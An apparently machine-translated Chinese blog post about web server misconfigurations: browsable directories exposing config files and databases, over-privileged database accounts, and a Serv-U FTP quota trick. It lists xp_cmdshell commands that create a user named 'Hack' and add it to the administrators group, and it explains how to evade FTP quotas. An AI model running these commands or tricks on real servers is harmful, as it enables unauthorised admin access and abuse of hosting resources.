Talking about Web Server Safety

xiaoxiao2021-03-06  14

The vulnerabilities he say here are vulnerabilities caused by the administrator configuration error.

1. The permissions of the directory should be set reasonable. Otherwise, it will cause web users to browse any directory.

Tool: Web Explorer

http://blog.9cbs.net/iuhxq/archive/2004/12/11/212987.aspx

Use it to view any directory, as long as there is permission. If you see Conn.asp or Web.config. . . . . . . Ha ha. . .

The Database is downloaded (Access). . . See if you still have other vulnerabilities?

2, the account connection account must not give administrator privileges. Otherwise it is very dangerous.

If you know the password of the database from above.

Then we can execute any system commands.

For example: xp_cmdshell 'DIR C: /'

and also

Tasklist

Taskkill

PSList

pskill

Net user

NET User Guest / Active: YES

NET User Hack Hack / Add

Net user Hack / DEL

Net localgruop administrators Hack / Add

Query User

LOGOFF 1

Is these orders horrible? Ha ha. So you must not give the web database to join account management privileges.

3, this is nothing to do with the web server, but it is also a vulnerability.

The general FTP server is set up with Serv-U. Its maximum quota limit is controlled by uploading download traffic. So we can use the web resource manager mentioned above to generate a big file in the ftp, such as 40M, then use FTP to log in, delete this 40M file so your space is 40m (actually you are using. There is less than 40m less space), do more times, look at FTP, the above will display 0M, huh, it is actually saved. More information.

Ok, let me say, thank you for your patience. 886 ~!

转载请注明原文地址:https://www.9cbs.com/read-67653.html

New Post(0)